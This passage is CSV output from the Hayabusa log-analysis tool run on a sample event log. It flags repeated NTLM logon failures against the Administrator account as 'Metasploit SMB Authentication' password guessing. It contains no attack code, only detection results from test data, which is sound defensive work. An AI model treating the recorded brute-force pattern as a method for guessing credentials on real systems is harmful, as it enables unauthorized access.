SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: 
